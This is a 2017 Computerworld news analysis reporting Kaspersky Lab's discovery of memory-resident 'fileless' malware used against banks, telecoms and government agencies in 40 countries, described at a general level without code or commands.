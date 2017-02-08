News Analysis

'Invisible' memory-based malware hit over 140 banks, telecoms and government agencies

Anti-forensic techniques such as the malware vanishing after reboot makes attribution nearly impossible.

Computerworld |

online hacker thinkstock
Credit: Thinkstock
More like this

Cybercriminals have hit more than 40 countries with hidden malware that steals passwords and financial data. The malware is not found on hard drives as it hides in the memory of compromised computers, making it almost “invisible” as criminals exfiltrate system administrators’ credentials and other sensitive data. When a targeted machine is rebooted, nearly all traces of the malware disappear.

Over 140 enterprise networks – banks, government organizations and telecommunication companies – from 40 countries have been hit, according to Kaspersky Lab. The cybercriminals are using methods and sophisticated malware previously used by nation-state attackers.

The U.S. has been the most targeted country with 21 hidden-malware attacks, followed by 10 attacks in France, nine in Ecuador, eight in Kenya, and seven in both the UK and Russia.

fileless malware hit over 140 enterprises in 40 countries Kaspersky Lab

Because the malware manages to hide so well, and poofs after a reboot, the number of infections may be much higher.

The “attacks are ongoing globally against banks themselves,” Kaspersky Lab’s Kurt Baumgartner told Ars Technica. “The banks have not been adequately prepared in many cases to deal with this.” The attackers are “targeting computers that run automatic teller machines” in order to push “money out of the banks from within the banks.”

The attackers have embraced anti-forensic techniques to avoid detection; malware loaded to RAM instead of a hard drive helps to keep it undetected as data is being stolen and systems are being remotely controlled. The attackers have used expired domains that have no WHOIS information. By using open source and legitimate tools, the cybercriminals are making attribution nearly impossible.

invisible malware discovered by kaspersky lab Kaspersky Lab

Researchers from Kaspersky Lab first learned of the “fileless” malware after a bank was attacked and it helped with forensic analysis. The bank found Meterpreter code in the memory of a server; Meterpreter was not supposed to be in the physical memory of the domain controller. Digging deeper, the researchers learned that the code had been injected into memory using PowerShell commands. The PowerShell scripts were hidden within Windows registry.

The attackers used Mimikatz, Kaspersky Lab said, to grab credentials from accounts with administrative privileges and NETSH to send stolen data back to their server.

It is presently unclear if the attacker is one group or if several groups are using the same tools. “Given that the attackers used the Metasploit framework, standard Windows utilities and unknown domains with no WHOIS information, this makes attribution almost impossible,” wrote Kaspersky Lab. However, the researchers noted that similar techniques have been used by the groups GCMAN and Carbanak.

Kaspersky Lab will reveal more details about the attack, as well as how the cybercriminals withdrew money from ATMs, at its Security Analyst Summit in April.

For now, Kaspersky has listed indicators of compromise; “detection of this attack would be possible in RAM, network and registry only.” After an infected machine is cleaned, all passwords must be changed. “This attack shows how no malware samples are needed for successful exfiltration of a network and how standard and open source utilities make attribution almost impossible.”

To express your thoughts on Computerworld content, visit Computerworld's Facebook page, LinkedIn page and Twitter stream.
Related:

Darlene Storm (not her real name) is a freelance writer with a background in information technology and information security.

Learn R programming basics with our PDF
You Might Like
Shop Tech Products at Amazon
What Readers Like
Tianhe 2
China reminds Trump that supercomputing is a race

China said it plans to develop a prototype of an exascale supercomputer by the end of this year,...

Google Keep
Why you should start using Google Keep right away

Services like Keep, Evernote and Microsoft OneNote are often called "note-taking apps." But they've...

ibm pc dos 1.0 screenshot
Say goodbye to the MS-DOS command prompt

It had a good 36-year run, but its day is done.

BrandPosts
Learn more
Popular Resources
Top Stories
H-1B visa passport Egypt
Trump reviews right of H-1B spouses to work

In 2014 President Obama signed a law allowing some H-1B spouses to work. That may now change again.

passport stamps
At Dulles, a security awareness success story

The detention of Norway’s former prime minister, when stripped of politics, was an example of proper...

H-1B visa airport arrival
Trump's ban becomes an H-1B fight

The U.S. technology industry warned President Donald Trump that his immigration order will hurt the...

Computerworld Podcast: Mingis on Tech
Mingis on Tech: Floating solar panels -- oxymoron or coming energy wave?

Our tech trio takes a look at the latest in solar tech -- panels being installed on waterways -- and...